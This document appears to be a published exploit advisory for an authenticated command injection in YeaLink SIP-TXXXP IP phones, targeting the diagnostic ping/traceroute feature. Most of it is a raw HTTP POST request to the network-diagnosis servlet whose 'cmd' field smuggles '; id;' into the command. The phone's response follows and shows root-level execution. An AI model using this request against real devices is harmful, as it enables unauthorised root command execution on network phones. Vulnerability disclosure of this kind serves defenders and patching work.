Authored by tahaafarooq

YeaLink SIP-TXXXP version suffers from a remote command injection vulnerability.

# Exploit Title: YeaLink SIP-TXXXP - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage:
# Version:
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)


Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection


POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98


HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<div id="_RES_INFO_">
uid=0(root) gid=0(root)